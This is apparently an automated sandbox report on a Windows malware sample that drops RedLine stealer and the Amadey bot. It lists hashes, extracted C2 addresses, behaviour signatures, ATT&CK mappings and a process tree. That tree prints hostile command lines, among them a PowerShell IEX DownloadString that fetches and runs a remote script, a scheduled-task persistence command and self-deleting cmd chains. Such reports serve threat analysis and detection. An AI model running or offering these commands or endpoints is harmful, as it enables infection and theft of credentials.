Analysis

  • max time kernel
    138s
  • max time network
    135s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-03-2023 13:56

General

  • Target

    0434ad98f07da0a81938527881afcb707408e7bebf04aca0ccd59f09f09f9efb.exe

  • Size

    1.0MB

  • MD5

    8c9359873e757d8046c325422a6f8980

  • SHA1

    dc4cec569c2056699b13c64435cde9e08771ce57

  • SHA256

    0434ad98f07da0a81938527881afcb707408e7bebf04aca0ccd59f09f09f9efb

  • SHA512

    5fee2b95bab0124e1e7fa022e172a593147e60f0e06605a95a59f5fdb492ce1c8a10ea136e9c953272d95d8d0cab9b2e9dd08e9f0ab22adbf5da83a52dbb3d14

  • SSDEEP

    24576:Yyxl2BKmc2GJvue8pBStn8Hb6A/B2u6TpW2:fxGTc3Jvh9q6TY

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://www.mdegmm.com/pdf/debug2.ps1

Extracted

Family

redline

Botnet

gena

C2

193.233.20.30:4125

Attributes
  • auth_value

    93c20961cb6b06b2d5781c212db6201e

Extracted

Family

redline

Botnet

vint

C2

193.233.20.30:4125

Attributes
  • auth_value

    fb8811912f8370b3d23bffda092d88d0

Extracted

Family

amadey

Version

3.68

C2

62.204.41.87/joomla/index.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 12 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 18 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • .NET Reactor proctector 5 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 15 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 9 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0434ad98f07da0a81938527881afcb707408e7bebf04aca0ccd59f09f09f9efb.exe
    "C:\Users\Admin\AppData\Local\Temp\0434ad98f07da0a81938527881afcb707408e7bebf04aca0ccd59f09f09f9efb.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:1100
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\zap7387.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\zap7387.exe
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:1676
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zap9908.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zap9908.exe
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:1284
        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\zap8453.exe
          C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\zap8453.exe
          4⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of WriteProcessMemory
          PID:2124
          • C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz5394.exe
            C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz5394.exe
            5⤵
            • Modifies Windows Defender Real-time Protection settings
            • Executes dropped EXE
            • Windows security modification
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1980
          • C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v3555Ec.exe
            C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v3555Ec.exe
            5⤵
            • Modifies Windows Defender Real-time Protection settings
            • Executes dropped EXE
            • Windows security modification
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1640
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1640 -s 1080
              6⤵
              • Program crash
              PID:4416
        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w29Xa81.exe
          C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w29Xa81.exe
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4376
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4376 -s 1348
            5⤵
            • Program crash
            PID:3412
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xtHht75.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xtHht75.exe
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2484
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y54sD79.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y54sD79.exe
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:3872
      • C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
        "C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:4412
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN legenda.exe /TR "C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe" /F
          4⤵
          • Creates scheduled task(s)
          PID:396
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "legenda.exe" /P "Admin:N"&&CACLS "legenda.exe" /P "Admin:R" /E&&echo Y|CACLS "..\f22b669919" /P "Admin:N"&&CACLS "..\f22b669919" /P "Admin:R" /E&&Exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3392
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            5⤵
              PID:1648
            • C:\Windows\SysWOW64\cacls.exe
              CACLS "legenda.exe" /P "Admin:N"
              5⤵
                PID:728
              • C:\Windows\SysWOW64\cacls.exe
                CACLS "legenda.exe" /P "Admin:R" /E
                5⤵
                  PID:4996
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  5⤵
                    PID:4084
                  • C:\Windows\SysWOW64\cacls.exe
                    CACLS "..\f22b669919" /P "Admin:N"
                    5⤵
                      PID:1944
                    • C:\Windows\SysWOW64\cacls.exe
                      CACLS "..\f22b669919" /P "Admin:R" /E
                      5⤵
                        PID:1556
                    • C:\Users\Admin\AppData\Local\Temp\1000112001\Good.exe
                      "C:\Users\Admin\AppData\Local\Temp\1000112001\Good.exe"
                      4⤵
                      • Executes dropped EXE
                      • Adds Run key to start application
                      • Suspicious use of SetThreadContext
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2392
                      • C:\Users\Admin\AppData\Local\Temp\1000112001\Good.exe
                        "C:\Users\Admin\AppData\Local\Temp\1000112001\Good.exe"
                        5⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4372
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\1000112001\Good.exe"
                          6⤵
                            PID:4952
                            • C:\Windows\SysWOW64\chcp.com
                              chcp 65001
                              7⤵
                                PID:3488
                              • C:\Windows\SysWOW64\PING.EXE
                                ping 127.0.0.1
                                7⤵
                                • Runs ping.exe
                                PID:3904
                        • C:\Users\Admin\AppData\Local\Temp\1000114001\sqlcmd.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000114001\sqlcmd.exe"
                          4⤵
                          • Checks computer location settings
                          • Executes dropped EXE
                          • Suspicious use of WriteProcessMemory
                          PID:4648
                          • C:\Windows\system32\cmd.exe
                            "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')"
                            5⤵
                            • Suspicious use of WriteProcessMemory
                            PID:3092
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')
                              6⤵
                              • Blocklisted process makes network request
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2260
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\1000114001\sqlcmd.exe" >> NUL
                            5⤵
                              PID:4924
                              • C:\Windows\SysWOW64\PING.EXE
                                ping 127.0.0.1
                                6⤵
                                • Runs ping.exe
                                PID:5084
                          • C:\Users\Admin\AppData\Local\Temp\1000115001\sqlcmd.exe
                            "C:\Users\Admin\AppData\Local\Temp\1000115001\sqlcmd.exe"
                            4⤵
                            • Checks computer location settings
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:3832
                            • C:\Windows\system32\cmd.exe
                              "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')"
                              5⤵
                                PID:1812
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')
                                  6⤵
                                  • Blocklisted process makes network request
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2468
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\1000115001\sqlcmd.exe" >> NUL
                                5⤵
                                  PID:2112
                                  • C:\Windows\SysWOW64\PING.EXE
                                    ping 127.0.0.1
                                    6⤵
                                    • Runs ping.exe
                                    PID:664
                              • C:\Windows\SysWOW64\rundll32.exe
                                "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
                                4⤵
                                • Loads dropped DLL
                                PID:2704
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 1640 -ip 1640
                          1⤵
                            PID:1268
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4376 -ip 4376
                            1⤵
                              PID:4244
                            • C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
                              C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
                              1⤵
                              • Executes dropped EXE
                              PID:2072
                            • C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
                              C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
                              1⤵
                              • Executes dropped EXE
                              PID:2376

                            Network

                            MITRE ATT&CK Matrix ATT&CK v6

                            Execution

                            Scheduled Task

                            1
                            T1053

                            Persistence

                            Modify Existing Service

                            1
                            T1031

                            Registry Run Keys / Startup Folder

                            1
                            T1060

                            Scheduled Task

                            1
                            T1053

                            Privilege Escalation

                            Scheduled Task

                            1
                            T1053

                            Defense Evasion

                            Modify Registry

                            3
                            T1112

                            Disabling Security Tools

                            2
                            T1089

                            Credential Access

                            Credentials in Files

                            2
                            T1081

                            Discovery

                            Query Registry

                            2
                            T1012

                            System Information Discovery

                            2
                            T1082

                            Remote System Discovery

                            1
                            T1018

                            Collection

                            Data from Local System

                            2
                            T1005

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5080DC7A65DB6A5960ECD874088F3328_862BA1770B2FEE013603D2FF9ABEAFDA
                              Filesize

                              2KB

                              MD5

                              fc88b7748eb4cd37ae886a1c0813e4cf

                              SHA1

                              23e30b76fc94f0467a3efad342a91a3b84ff1eea

                              SHA256

                              3d81e317f8816680185517d7719e51fdbcd5807f9c629c4e3d0408820ec458da

                              SHA512

                              bb8ffaa2e8e581aa8d9a2e39b5f16c784d1431b4c18acc71b8fea84a4982d13a8ed1e5cf295c459ca35d8d4604c050210e0771386e7fe57d35c5ccd41fb92211

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_2DBE917624E9880FE0C7C5570D56E691
                              Filesize

                              1KB

                              MD5

                              cb684ec7fe8555f949182c7423dafdc2

                              SHA1

                              ec49f7b4b777fa1da40af5328785782127ffc52c

                              SHA256

                              8e17b090e2d07abf04860e961e601d8c663d3eaafd16190e6e6b6a4f018c0b0e

                              SHA512

                              ef627ca15ac143710b707ce28bd0cbe3447446db64c61f89d78f7c868cad07bd267563a7927ac4cd733adf2da3d58dcfadba54f8e0bc78e06d79cd389b77e500

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5080DC7A65DB6A5960ECD874088F3328_862BA1770B2FEE013603D2FF9ABEAFDA
                              Filesize

                              482B

                              MD5

                              be7ec44ed9b330de82b5a2950b771444

                              SHA1

                              3b7e242f3de0af9fd98854e21c0e8dd525586d08

                              SHA256

                              9770cee1d1fa834354d5c6685f203ee0abcc49b5a4532ffb35ca30e8910c0dd1

                              SHA512

                              1106e9d5925137611c8e08ae7bb95a1ee439c94e3d8b3754b2d3a486aefb8acd89be357c34c5bb86fb006ea06038f672510c65c34509e6c8d24000b43d965b57

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_2DBE917624E9880FE0C7C5570D56E691
                              Filesize

                              486B

                              MD5

                              5078fd662ca97f777bfcea78cc3ddfb3

                              SHA1

                              d78cbd2b8464d3c1cdb1c656e104ca8387149b1d

                              SHA256

                              5118263994960577690a75b38cde69609d3ceb33c462d669daea05c16b42ad93

                              SHA512

                              b4a39f41a4660520c4d2b301da66597e75d7549d83449e7e75910bf5ab63d0445f78948e4be265b42b0e79e6bc9d7e4852c30eef5e793b3240b105fadeef32f7

                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Good.exe.log
                              Filesize

                              321B

                              MD5

                              08027eeee0542c93662aef98d70095e4

                              SHA1

                              42402c02bf4763fcd6fb0650fc13386f2eae8f9b

                              SHA256

                              1b9ec007ac8e7de37c61313c5e1b9444df6dc0cd9110553bfa281b13204a646d

                              SHA512

                              c4e7a17a1dc1f27c91791439d92435a5d750a065508e9539c9af458f21472a7ce45ba0666ef6855a00386e1a75c518d0908b82d929084a1b67ca4c65997a5979

                            • C:\Users\Admin\AppData\Local\Temp\1000112001\Good.exe
                              Filesize

                              5.4MB

                              MD5

                              9086ff963ae98510ea0eb9abad045939

                              SHA1

                              e9999c73e07daf9ba223fbf796d56ae762b748fa

                              SHA256

                              138c7f0a55344e824bfd3cba1ddae87b237500005fd09a22cbde021ec017454f

                              SHA512

                              f1baace8518ebc24bf71e7e7612427eacd44ef51b5f499ae58764a74a6813ca0eb27974855a7d7d58144cd4ee211fbc3f39ce1c49415e977e057c0078f5c1fee

                            • C:\Users\Admin\AppData\Local\Temp\1000112001\Good.exe
                              Filesize

                              5.4MB

                              MD5

                              9086ff963ae98510ea0eb9abad045939

                              SHA1

                              e9999c73e07daf9ba223fbf796d56ae762b748fa

                              SHA256

                              138c7f0a55344e824bfd3cba1ddae87b237500005fd09a22cbde021ec017454f

                              SHA512

                              f1baace8518ebc24bf71e7e7612427eacd44ef51b5f499ae58764a74a6813ca0eb27974855a7d7d58144cd4ee211fbc3f39ce1c49415e977e057c0078f5c1fee

                            • C:\Users\Admin\AppData\Local\Temp\1000112001\Good.exe
                              Filesize

                              5.4MB

                              MD5

                              9086ff963ae98510ea0eb9abad045939

                              SHA1

                              e9999c73e07daf9ba223fbf796d56ae762b748fa

                              SHA256

                              138c7f0a55344e824bfd3cba1ddae87b237500005fd09a22cbde021ec017454f

                              SHA512

                              f1baace8518ebc24bf71e7e7612427eacd44ef51b5f499ae58764a74a6813ca0eb27974855a7d7d58144cd4ee211fbc3f39ce1c49415e977e057c0078f5c1fee

                            • C:\Users\Admin\AppData\Local\Temp\1000112001\Good.exe
                              Filesize

                              5.4MB

                              MD5

                              9086ff963ae98510ea0eb9abad045939

                              SHA1

                              e9999c73e07daf9ba223fbf796d56ae762b748fa

                              SHA256

                              138c7f0a55344e824bfd3cba1ddae87b237500005fd09a22cbde021ec017454f

                              SHA512

                              f1baace8518ebc24bf71e7e7612427eacd44ef51b5f499ae58764a74a6813ca0eb27974855a7d7d58144cd4ee211fbc3f39ce1c49415e977e057c0078f5c1fee

                            • C:\Users\Admin\AppData\Local\Temp\1000114001\sqlcmd.exe
                              Filesize

                              144KB

                              MD5

                              b5baf2e6261a1fb05bb2654c8d099dd6

                              SHA1

                              2a5b25fcb9e9f584d0a162b734c7dcc53c6e0550

                              SHA256

                              4a98a49f3b4b3013d38069110fccb50850cb2a42088bf7b49054da5cc0ef7a0d

                              SHA512

                              4ac6847ff23850bbdb04f696c85444ff2d1aa38cf508d60e6c1638e877b4233bf343e43cbcf84dd50151c593c5a181679488c207f8ea80dc088518f99e50d7d3

                            • C:\Users\Admin\AppData\Local\Temp\1000114001\sqlcmd.exe
                              Filesize

                              144KB

                              MD5

                              b5baf2e6261a1fb05bb2654c8d099dd6

                              SHA1

                              2a5b25fcb9e9f584d0a162b734c7dcc53c6e0550

                              SHA256

                              4a98a49f3b4b3013d38069110fccb50850cb2a42088bf7b49054da5cc0ef7a0d

                              SHA512

                              4ac6847ff23850bbdb04f696c85444ff2d1aa38cf508d60e6c1638e877b4233bf343e43cbcf84dd50151c593c5a181679488c207f8ea80dc088518f99e50d7d3

                            • C:\Users\Admin\AppData\Local\Temp\1000114001\sqlcmd.exe
                              Filesize

                              144KB

                              MD5

                              b5baf2e6261a1fb05bb2654c8d099dd6

                              SHA1

                              2a5b25fcb9e9f584d0a162b734c7dcc53c6e0550

                              SHA256

                              4a98a49f3b4b3013d38069110fccb50850cb2a42088bf7b49054da5cc0ef7a0d

                              SHA512

                              4ac6847ff23850bbdb04f696c85444ff2d1aa38cf508d60e6c1638e877b4233bf343e43cbcf84dd50151c593c5a181679488c207f8ea80dc088518f99e50d7d3

                            • C:\Users\Admin\AppData\Local\Temp\1000115001\sqlcmd.exe
                              Filesize

                              144KB

                              MD5

                              b5baf2e6261a1fb05bb2654c8d099dd6

                              SHA1

                              2a5b25fcb9e9f584d0a162b734c7dcc53c6e0550

                              SHA256

                              4a98a49f3b4b3013d38069110fccb50850cb2a42088bf7b49054da5cc0ef7a0d

                              SHA512

                              4ac6847ff23850bbdb04f696c85444ff2d1aa38cf508d60e6c1638e877b4233bf343e43cbcf84dd50151c593c5a181679488c207f8ea80dc088518f99e50d7d3

                            • C:\Users\Admin\AppData\Local\Temp\1000115001\sqlcmd.exe
                              Filesize

                              144KB

                              MD5

                              b5baf2e6261a1fb05bb2654c8d099dd6

                              SHA1

                              2a5b25fcb9e9f584d0a162b734c7dcc53c6e0550

                              SHA256

                              4a98a49f3b4b3013d38069110fccb50850cb2a42088bf7b49054da5cc0ef7a0d

                              SHA512

                              4ac6847ff23850bbdb04f696c85444ff2d1aa38cf508d60e6c1638e877b4233bf343e43cbcf84dd50151c593c5a181679488c207f8ea80dc088518f99e50d7d3

                            • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y54sD79.exe
                              Filesize

                              235KB

                              MD5

                              5086db99de54fca268169a1c6cf26122

                              SHA1

                              003f768ffcc99bda5cda1fb966fda8625a8fdc3e

                              SHA256

                              42873b0c5899f64b5f3205a4f3146210cc63152e529c69d6292b037844c81ec4

                              SHA512

                              90531b1b984b21ce62290b713ffc07917bbd766eef7d5e6f4c1c68b2fc7d29495cdd5f05fd71fe5107f1614bbb30922dcfb730f50599e44aeaff52c50f46b8b5

                            • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y54sD79.exe
                              Filesize

                              235KB

                              MD5

                              5086db99de54fca268169a1c6cf26122

                              SHA1

                              003f768ffcc99bda5cda1fb966fda8625a8fdc3e

                              SHA256

                              42873b0c5899f64b5f3205a4f3146210cc63152e529c69d6292b037844c81ec4

                              SHA512

                              90531b1b984b21ce62290b713ffc07917bbd766eef7d5e6f4c1c68b2fc7d29495cdd5f05fd71fe5107f1614bbb30922dcfb730f50599e44aeaff52c50f46b8b5

                            • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\zap7387.exe
                              Filesize

                              875KB

                              MD5

                              0ce620a976a475d02c89a80de7bb24cf

                              SHA1

                              32eb9c86bcfbc78b4ba49b59ca5ef9050c3dd2c2

                              SHA256

                              5bf6d5d107af4cb9d80134e466514a3dcdc7b01c0d9ffb1438ffe2596663bcda

                              SHA512

                              3d3b0036d3a8716737791da2ad83847c8b63b9561da643e80da5492d691e9ef25e8d787a0fe6bf9e05d693bff4c797dfe1909977680fb3eace8d6d9262c297c2

                            • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\zap7387.exe
                              Filesize

                              875KB

                              MD5

                              0ce620a976a475d02c89a80de7bb24cf

                              SHA1

                              32eb9c86bcfbc78b4ba49b59ca5ef9050c3dd2c2

                              SHA256

                              5bf6d5d107af4cb9d80134e466514a3dcdc7b01c0d9ffb1438ffe2596663bcda

                              SHA512

                              3d3b0036d3a8716737791da2ad83847c8b63b9561da643e80da5492d691e9ef25e8d787a0fe6bf9e05d693bff4c797dfe1909977680fb3eace8d6d9262c297c2

                            • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xtHht75.exe
                              Filesize

                              175KB

                              MD5

                              3389637c0d072121bf1b127629736d37

                              SHA1

                              300e915efdf2479bfd0d3699c0a6bc51260f9655

                              SHA256

                              2b74c4ce2674a8fc0c78fffa39c5de5e43ae28b8bf425349a5f97c6a61135153

                              SHA512

                              a32cc060d2600f6ca94ffdce07c95ea5e2f56c0b418260456b568cb41e5f55db0c4fc97c35ca4103c674e61a17300d834d2c0da5a78b7084b6bc342fd23a7fb4

                            • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xtHht75.exe
                              Filesize

                              175KB

                              MD5

                              3389637c0d072121bf1b127629736d37

                              SHA1

                              300e915efdf2479bfd0d3699c0a6bc51260f9655

                              SHA256

                              2b74c4ce2674a8fc0c78fffa39c5de5e43ae28b8bf425349a5f97c6a61135153

                              SHA512

                              a32cc060d2600f6ca94ffdce07c95ea5e2f56c0b418260456b568cb41e5f55db0c4fc97c35ca4103c674e61a17300d834d2c0da5a78b7084b6bc342fd23a7fb4

                            • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zap9908.exe
                              Filesize

                              734KB

                              MD5

                              3558a786a3cf86cbd5e010bef72025f9

                              SHA1

                              3bd01f61d5e560ed790358d26b31b0d6e652d264

                              SHA256

                              45476ce4f82d57e2389477171d117bd73a1ac83d14b676140608648750e56c62

                              SHA512

                              4017606edbc07460706ade6086c03bd295cf552987b96e189cf99450b6ea8b5f64888605e7b5cb526f96a04e81e525d7b526e298268634652567d33f956a0295

                            • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zap9908.exe
                              Filesize

                              734KB

                              MD5

                              3558a786a3cf86cbd5e010bef72025f9

                              SHA1

                              3bd01f61d5e560ed790358d26b31b0d6e652d264

                              SHA256

                              45476ce4f82d57e2389477171d117bd73a1ac83d14b676140608648750e56c62

                              SHA512

                              4017606edbc07460706ade6086c03bd295cf552987b96e189cf99450b6ea8b5f64888605e7b5cb526f96a04e81e525d7b526e298268634652567d33f956a0295

                            • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w29Xa81.exe
                              Filesize

                              420KB

                              MD5

                              298d656ece820ba2b6746110d90de329

                              SHA1

                              5cbfa1efbe9e8cbb09acb6a27e852a6b97b7e6b2

                              SHA256

                              6c2f55712013e71c2e1af55574a08b54a47901db2f4f7bfea677cd026aab8bdb

                              SHA512

                              35ad63bd26de95a9de4c88f1321b5957300b6963fdce915b6556d6b97091929698fca736d2590ed9e4856b3f95cbee11e4fdaa2c010a905c41fb514c66aab948

                            • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w29Xa81.exe
                              Filesize

                              420KB

                              MD5

                              298d656ece820ba2b6746110d90de329

                              SHA1

                              5cbfa1efbe9e8cbb09acb6a27e852a6b97b7e6b2

                              SHA256

                              6c2f55712013e71c2e1af55574a08b54a47901db2f4f7bfea677cd026aab8bdb

                              SHA512

                              35ad63bd26de95a9de4c88f1321b5957300b6963fdce915b6556d6b97091929698fca736d2590ed9e4856b3f95cbee11e4fdaa2c010a905c41fb514c66aab948

                            • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\zap8453.exe
                              Filesize

                              363KB

                              MD5

                              8f272df9f6c0898fe8ad55eb442def10

                              SHA1

                              a999337be2f99c78b764f8fcaa75f6bc44cb6ed7

                              SHA256

                              977410875d8267ef18f52c184281323283e219ba90dc4ae75683b6baf0757640

                              SHA512

                              11bbc3a436c77215c910d882d5af3e462079a097306fe37c86409b50e9b5e5df14f6adad875fce83773b349a8f136f76fe097575c6188d806c4ddb43bd71a6f6

                            • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\zap8453.exe
                              Filesize

                              363KB

                              MD5

                              8f272df9f6c0898fe8ad55eb442def10

                              SHA1

                              a999337be2f99c78b764f8fcaa75f6bc44cb6ed7

                              SHA256

                              977410875d8267ef18f52c184281323283e219ba90dc4ae75683b6baf0757640

                              SHA512

                              11bbc3a436c77215c910d882d5af3e462079a097306fe37c86409b50e9b5e5df14f6adad875fce83773b349a8f136f76fe097575c6188d806c4ddb43bd71a6f6

                            • C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz5394.exe
                              Filesize

                              11KB

                              MD5

                              7e93bacbbc33e6652e147e7fe07572a0

                              SHA1

                              421a7167da01c8da4dc4d5234ca3dd84e319e762

                              SHA256

                              850cd190aaeebcf1505674d97f51756f325e650320eaf76785d954223a9bee38

                              SHA512

                              250169d7b6fcebff400be89edae8340f14130ced70c340ba9da9f225f62b52b35f6645bfb510962efb866f988688cb42392561d3e6b72194bc89d310ea43aa91

                            • C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz5394.exe
                              Filesize

                              11KB

                              MD5

                              7e93bacbbc33e6652e147e7fe07572a0

                              SHA1

                              421a7167da01c8da4dc4d5234ca3dd84e319e762

                              SHA256

                              850cd190aaeebcf1505674d97f51756f325e650320eaf76785d954223a9bee38

                              SHA512

                              250169d7b6fcebff400be89edae8340f14130ced70c340ba9da9f225f62b52b35f6645bfb510962efb866f988688cb42392561d3e6b72194bc89d310ea43aa91

                            • C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v3555Ec.exe
                              Filesize

                              363KB

                              MD5

                              46efae73964b01099bbe5cb5c3570856

                              SHA1

                              84c770685f48cf424f0ca578d7270df158be2164

                              SHA256

                              c14ae92002ed24f2f936ad8d92ad182fac3940c3254373edd4baa622bde26f9f

                              SHA512

                              9d77de119899b355b2dd5d7421f8cdf8774b210bd3cf0763431ef8377b66c4a11de0cb2456230ecc3203f5ca6003f9193936c48e4ed26ecebb86f8306c069051

                            • C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v3555Ec.exe
                              Filesize

                              363KB

                              MD5

                              46efae73964b01099bbe5cb5c3570856

                              SHA1

                              84c770685f48cf424f0ca578d7270df158be2164

                              SHA256

                              c14ae92002ed24f2f936ad8d92ad182fac3940c3254373edd4baa622bde26f9f

                              SHA512

                              9d77de119899b355b2dd5d7421f8cdf8774b210bd3cf0763431ef8377b66c4a11de0cb2456230ecc3203f5ca6003f9193936c48e4ed26ecebb86f8306c069051

                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_de32nbt5.sq1.ps1
                              Filesize

                              60B

                              MD5

                              d17fe0a3f47be24a6453e9ef58c94641

                              SHA1

                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                              SHA256

                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                              SHA512

                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                            • C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
                              Filesize

                              235KB

                              MD5

                              5086db99de54fca268169a1c6cf26122

                              SHA1

                              003f768ffcc99bda5cda1fb966fda8625a8fdc3e

